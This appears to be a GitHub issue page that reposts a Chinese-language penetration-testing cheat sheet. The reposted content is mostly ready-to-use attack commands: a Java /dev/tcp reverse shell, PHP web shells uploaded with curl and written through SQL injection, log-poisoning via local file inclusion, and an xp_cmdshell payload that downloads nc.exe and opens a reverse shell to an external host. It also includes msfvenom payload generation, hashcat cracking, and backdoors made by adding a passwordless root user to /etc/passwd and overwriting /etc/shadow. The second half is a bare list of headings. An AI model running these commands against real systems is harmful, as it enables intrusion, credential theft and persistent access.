You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
# Windows User Accounts
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25
# Windows Running Programs
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2
# Windows Hostname
snmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5
# Windows Share Information
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1
# Windows Share Information
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27
# Windows TCP Ports
snmpwalk -c public -v1 $TARGET4 1.3.6.1.2.1.6.13.1.3
# Software Name
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2
# brute-force community strings
onesixtyone -i snmp-ips.txt -c community.txt
snmp-check $TARGET
r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
XTerm
xterm -display 10.0.0.1:1
JDWP RCE
print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine())
Working with Restricted Shells
print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine())
nice /bin/bash
Interactive TTY Shells
/usr/bin/expect sh
python -c ‘import pty; pty.spawn(“/bin/sh”)’
# execute one command with su as another user if you do not have access to the shell. Credit to g0blin.co.uk
python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'
通过form表单进行文件上传
# POST file
curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie"
# POST binary data to web form
curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v
PUT方法
curl -X PUT -d '<?php system($_GET["c"]);?>' http://192.168.2.99/shell.php
# Bruteforce based on the pattern;
hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout
# Generate password candidates: wordlist + pattern;
hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" yourPassword|/usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout
msfvenom 生成Payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.245 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
Compiling Code From Linux
# Windows
i686-w64-mingw32-gcc source.c -lws2_32 -o out.exe
# Linux
gcc -m32|-m64 -o output source.c
本地文件包含拿Shell
nc 192.168.1.102 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close
# Then send as cmd payload via http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id
cmd /c dir 是执行完dir命令后关闭命令窗口。
cmd /k dir 是执行完dir命令后不关闭命令窗口。
cmd /c start dir 会打开一个新窗口后执行dir指令,原窗口会关闭。
cmd /k start dir 会打开一个新窗口后执行dir指令,原窗口不会关闭。
利用好Sql注入
# Assumed 3 columns
http://target/index.php?vulnParam=0' UNION ALL SELECT 1,"<?php system($_REQUEST['cmd']);?>",2,3 INTO OUTFILE "c:/evil.php"-- uMj
# sqlmap; post-request - captured request via Burp Proxy via Save Item to File.
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
# sqlmap; post-request - captured request via Burp Proxy via Save Item to File.
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
xp_cmdshell
# netcat reverse shell via mssql injection when xp_cmdshell is available
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
SQLite
ATTACH DATABASE '/home/www/public_html/uploads/phpinfo.php' as pwn;
CREATE TABLE pwn.shell (code TEXT);
INSERT INTO pwn.shell (code) VALUES ('<?php system($_REQUEST['cmd']);?>');
#TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp
service atftpd start
# Windows
tftp -i $ATTACKER get /download/location/file /save/location/file
FTP
# Linux: set up ftp server with anonymous logon access;
twistd -n ftp -p 21 -r /file/to/serve
# Windows shell: read FTP commands from ftp-commands.txt non-interactively;
echo open $ATTACKER>ftp-commands.txt
echo anonymous>>ftp-commands.txt
echo whatever>>ftp-commands.txt
echo binary>>ftp-commands.txt
echo get file.exe>>ftp-commands.txt
echo bye>>ftp-commands.txt
ftp -s:ftp-commands.txt
# Or just a one-liner
(echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd
# 1. In Linux, convert binary to hex ascii:
wine /usr/share/windows-binaries/exe2bat.exe /root/tools/netcat/nc.exe nc.txt
# 2. Paste nc.txt into Windows Shell.
# Listen on local port 8080 and forward incoming traffic to REMOT_HOST:PORT via SSH_SERVER
# Scenario: access a host that's being blocked by a firewall via SSH_SERVER;
ssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER
SSH动态端口转发
# Listen on local port 8080. Incoming traffic to 127.0.0.1:8080 forwards it to final destination via SSH_SERVER
# Scenario: proxy your web traffic through SSH tunnel OR access hosts on internal network via a compromised DMZ box;
ssh -D 127.0.0.1:8080 user@SSH_SERVER
SSH远程端口转发
# Open port 5555 on SSH_SERVER. Incoming traffic to SSH_SERVER:5555 is tunneled to LOCALHOST:3389
# Scenario: expose RDP on non-routable network;
ssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER
plink -R ATTACKER:ATTACKER_PORT:127.0.01:80 -l root -pw pw ATTACKER_IP
代理隧道
# Open a local port 127.0.0.1:5555. Incoming traffic to 5555 is proxied to DESTINATION_HOST through PROXY_HOST:3128
# Scenario: a remote host has SSH running, but it's only bound to 127.0.0.1, but you want to reach it;
proxytunnel -p PROXY_HOST:3128 -d DESTINATION_HOST:22 -a 5555
ssh user@127.0.0.1 -p 5555
http隧道
# Server - open port 80. Redirect all incoming traffic to localhost:80 to localhost:22
hts -F localhost:22 80
# Client - open port 8080. Redirect all incoming traffic to localhost:8080 to 192.168.1.15:80
htc -F 8080 192.168.1.15:80
# Client - connect to localhost:8080 -> get tunneled to 192.168.1.15:80 -> get redirected to 192.168.1.15:22
ssh localhost -p 8080
# Query the local db for a quick file find. Run updatedb before executing locate.
locate passwd
# Show which file would be executed in the current environment, depending on $PATH environment variable;
which nc wget curl php perl python netcat tftp telnet ftp
# Search for *.conf (case-insensitive) files recursively starting with /etc;
find /etc -iname *.conf
echo 'spotless::0:0:root:/root:/bin/bash' >> /etc/passwd
# Rarely needed, but if you need to add a password to the previously created user by using useradd and passwd is not working. Pwd is "kali"
sed 's/!/\$6$o1\.HFMVM$a3hY6OPT\/DiQYy4koI6Z3\/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8\/6wJI6uF\/Q7mniOdq92v6yjzlVlXlxkT\./' /etc/shadow > /etc/s2; cat /etc/s2 > /etc/shadow; rm /etc/s2
转载自先知社区
情报侦查
从nmap里面提取出实时存活的IP
简单的端口扫描
DNS lookups, Zone Transfers & Brute-Force
Banner 抓取
NFS共享
列出NFS导出的共享文件,如果RW和no_root_squash存在,那就直接上传Sid-Shell执行。
Kerberos User Enumeration
HTTP Brute-Force & Vulnerability Scanning
RPC/NetBios/SMB
SNMP
SMTP
Active Directory
提一下,就是那些信息搜集工具都是基于自带的函数进行整理,经典的PowerView,熟悉这些对自己开发工具也有好处。
当前Domain信息
powershell命令自动补全很牛X,因为有些字段很长。
![](https://camo.githubusercontent.com/b72f4c65c72f575b62b7878cdbe7f2f088ccc6274fbeb07422c94a894e35f78d/68747470733a2f2f787a66696c652e616c6979756e63732e636f6d2f6d656469612f75706c6f61642f706963747572652f32303139303333303039343734332d63663266363838322d353238642d312e706e67)
域信任
当前林信息
林信任信息
一个域的所有DC
拿到DC当前的认证信息
cmd里面得到信任域信息
得到用户信息
得到当前经过身份认证的DC
获取用户信息
获得访问权限
温故一下反弹shell
Bash
Perl
URL-Encoded Perl: Linux
Python
php
Ruby
Netcat without -e #1
Netcat without -e #2
Java
XTerm
JDWP RCE
Working with Restricted Shells
Interactive TTY Shells
通过form表单进行文件上传
PUT方法
Payload生成模式和偏移量
Bypassing File Upload
图片里面注入Code
.htaccess
技巧Cracking Passwords
Crack Web
Crack Others
HashCat Cracking
msfvenom 生成Payload
Compiling Code From Linux
本地文件包含拿Shell
本地文件包含到任意文件读取
玩坏的了,备忘录嘛。
Windows + PHP
ps:
利用好Sql注入
xp_cmdshell
SQLite
MS-SQL Console
无交互式Shell
Python代码执行
Local Enumeration & Privilege Escalation
ImmunityDebugger
Get Loaded Modules
JMP ESP地址
破zip密码
Simple HTTP server
Mysql提权
需要
地址失效了,我联系作者补一下。
Docker提权
重置root用户密码
上传文件到目标上
TFTP
FTP
CertUtil
PHP
Python
HTTP: Powershell
HTTP: VBScript
HTTP: Linux
Netcat
HTTP: Windows "debug.exe" Method
HTTP: Windows BitsAdmin
HTTP: Windows BitsAdmin
Whois Data Exfiltration
Cancel 数据泄露
rlogin数据泄露
指定范围ping
爆破XOR
生成错误字符
.py -> .exe
Netcat Portscan
渗透Windows 服务
查找为指定用户显式设置的文件/文件夹权限
AlwaysInstallElevated MSI
Metasploit PowershellAlwaysInstallElevated提权实战
Windows凭证
没带引号的服务路径
服务后门
Port Forwarding / SSH Tunneling
SSH: Local Port Forwarding
SSH动态端口转发
SSH远程端口转发
代理隧道
http隧道
Netsh转发
RunAs
powershell
CMD
PsExec
Pth-WinExe
发现隐藏文件
常规的文件搜索操作
后渗透
注册表配置单元
hivexsh - Windows注册表配置单元shell
解密VNC的密码
创建用户并添加到管理员组
Wingtips:在无回显的时候,添加失败可能是因为你的密码强度不符合密码策略。
SSH keys
Creating Backdoor
另外创建一个root用户
OpenSSL Password
定时任务
原文链接
The text was updated successfully, but these errors were encountered: